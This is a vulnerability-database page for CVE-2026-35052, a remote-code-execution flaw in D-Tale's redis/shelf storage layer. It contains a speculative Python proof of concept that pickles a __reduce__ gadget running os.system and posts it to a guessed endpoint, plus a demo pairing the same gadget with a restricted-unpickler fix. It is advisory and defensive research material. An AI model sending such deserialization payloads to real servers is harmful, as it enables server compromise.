Security Vulnerability Report
CVE-2026-35052 CVSS 9.8 CRITICAL

CVE-2026-35052

Published: 2026-04-06 18:16:43
Last Modified: 2026-04-20 18:36:34

Description

D-Tale is the combination of a Flask back-end and a React front-end to view & analyze Pandas data structures. Prior to 3.22.0, users hosting D-Tale publicly while using a redis or shelf storage layer could be vulnerable to remote code execution allowing attackers to run malicious code on the server. This vulnerability is fixed in 3.22.0.

CVSS Details

CVSS Score (Primary, CVSS 3.1, NVD analysis)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Score (Secondary, CVSS 4.0, from the raw data below)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Weaknesses
CWE-79 (Secondary source); NVD-CWE-noinfo (NVD)

Note: the two assessments on this page do not agree. The 3.1 vector describes an unauthenticated, no-interaction attack with high confidentiality, integrity and availability impact, which matches the remote code execution wording of the description. The 4.0 vector requires passive user interaction (UI:P), records no impact on the vulnerable component itself (VC:N/VI:N/VA:N) and only low impact on subsequent systems (SC:L/SI:L), which is the profile of the CWE-79 (cross-site scripting) classification attached to the same source. Use 9.8 as the triage ceiling, but confirm the actual attack path against the vendor advisory before assuming an unauthenticated RCE primitive; the affected range (< 3.22.0) and the fix version are the same either way.

Configurations (Affected Products)

cpe:2.3:a:man:d-tale:*:*:*:*:*:*:*:* - VULNERABLE
D-Tale < 3.22.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a speculative proof of concept: the endpoint path, the JSON field names, the base64 encoding and the assumption that the redis/shelf layer unpickles request data are the PoC's own guesses (its comments say as much) and are not stated anywhere in the advisory data on this page. Expect to adapt it after reading the vendor advisory.

```python
import requests
import pickle
import base64

# Proof of Concept for CVE-2026-35052
# Description: Exploits insecure deserialization in D-Tale using Redis/Shelf storage.

# Target configuration
TARGET_URL = "http://vulnerable-d-tale-host:40000"


# Define malicious payload (e.g., command execution)
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., creating a file or reverse shell).
        # pickle runs this callable with these arguments at load time.
        import os
        return (os.system, ('touch /tmp/pwned',))


# Serialize the payload using pickle
serialized_data = pickle.dumps(MaliciousPayload())

# Encode if necessary (depending on API implementation)
# Assuming the API accepts base64 encoded data for storage
encoded_payload = base64.b64encode(serialized_data).decode('utf-8')

# Construct the malicious request
# Note: The exact endpoint might vary based on D-Tale configuration
endpoint = f"{TARGET_URL}/dtale/process-data"
headers = {
    "Content-Type": "application/json"
}

# Payload structure simulating data sent to the storage layer
payload_json = {
    "data_id": "exploit_test",
    "data": encoded_payload,
    "store_type": "redis"  # Explicitly targeting vulnerable storage
}

try:
    print("Sending malicious payload to target...")
    response = requests.post(endpoint, json=payload_json, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error during exploitation: {e}")
```
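The PoC rests on one premise: that the redis or shelf storage layer hands bytes an attacker can influence to pickle.loads(). Nothing on this page confirms that is how the D-Tale bug works, but the premise itself is worth seeing end to end, because it applies to any Python service that pickles state into redis or a shelf (Python's shelve module unpickles every value read from a shelf). The example below is an added illustration and is not D-Tale's code. It shows the same primitive the PoC uses (a __reduce__ gadget, with eval standing in for os.system so the result is checkable), why a naive reader executes it no matter which web endpoint planted the bytes, and how a restricted unpickler refuses the gadget while still loading ordinary state. FakeRedis, the key name dtale:1 and the sample state dict are constructed for the example; the allowlist is illustrative and would need to match whatever types a real state blob contains.

```python
import io
import pickle


class Gadget:
    """Pickle payload whose __reduce__ makes the unpickler call eval(expr).

    eval stands in for the os.system call in the PoC: same primitive (an
    attacker-chosen callable applied to attacker-chosen arguments at load
    time), but with a return value the caller can inspect.
    """

    def __init__(self, expr):
        self.expr = expr

    def __reduce__(self):
        # Consumed by pickle.loads(); pickle.dumps() only records it.
        return (eval, (self.expr,))


def build_payload(expr="__import__('os').getpid()"):
    """Serialize a Gadget; these bytes are what an attacker would plant."""
    return pickle.dumps(Gadget(expr))


class FakeRedis:
    """Hypothetical stand-in for a redis client: bytes in, bytes out."""

    def __init__(self):
        self._kv = {}

    def set(self, key, value):
        self._kv[key] = value

    def get(self, key):
        return self._kv.get(key)


def vulnerable_read(store, key):
    """The pattern that turns a storage layer into an RCE sink:
    whatever bytes sit under the key go straight to pickle.loads()."""
    return pickle.loads(store.get(key))


# Globals a legitimate state blob may reference. Built-in containers and
# scalars are encoded as opcodes and never pass through find_class, so a
# plain dict/list/str/int payload needs no entry here.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL / STACK_GLOBAL lookup not on the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def hardened_read(store, key):
    return RestrictedUnpickler(io.BytesIO(store.get(key))).load()


def demo():
    """Overwrite a legitimate blob with a gadget and read it back both ways.

    Returns (value the gadget produced under the naive reader,
             True if the restricted reader refused the gadget,
             the legitimate blob as decoded by the restricted reader).
    """
    store = FakeRedis()
    legit = {"data_id": 1, "columns": ["a", "b"], "rows": 3}  # constructed sample
    store.set("dtale:1", pickle.dumps(legit))

    # Ordinary state loads fine through the restricted reader.
    decoded_legit = hardened_read(store, "dtale:1")

    # An attacker who can write the key, or the bytes on their way into it,
    # swaps in the gadget. The web path used to get there is irrelevant.
    store.set("dtale:1", build_payload())

    executed = vulnerable_read(store, "dtale:1")  # eval() has run by now
    try:
        hardened_read(store, "dtale:1")
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return executed, blocked, decoded_legit


if __name__ == "__main__":
    pid, blocked, legit = demo()
    print(f"naive loads() executed attacker expression, returned pid {pid}")
    print(f"restricted loads() refused gadget: {blocked}; legit state: {legit}")
```

The allowlist approach only helps if the backend never needs to unpickle arbitrary user classes; where it does, the safer fix is a format without code-execution semantics (JSON, or a dataframe serializer such as Parquet) plus authentication on the store itself, since an attacker with write access to redis can poison any pickled key.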

References

https://github.com/man-group/dtale/security/advisories/GHSA-436g-fhfc-9g5w (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35052", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:42.747", "lastModified": "2026-04-20T18:36:34.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Tale is the combination of a Flask back-end and a React front-end to view & analyze Pandas data structures. Prior to 3.22.0, users hosting D-Tale publicly while using a redis or shelf storage layer could be vulnerable to remote code execution allowing attackers to run malicious code on the server. This vulnerability is fixed in 3.22.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:man:d-tale:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.22.0", "matchCriteriaId": "B6E18AFE-D726-4140-9A1D-1A993EF4B206"}]}]}], "references": [{"url": "https://github.com/man-group/dtale/security/advisories/GHSA-436g-fhfc-9g5w", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}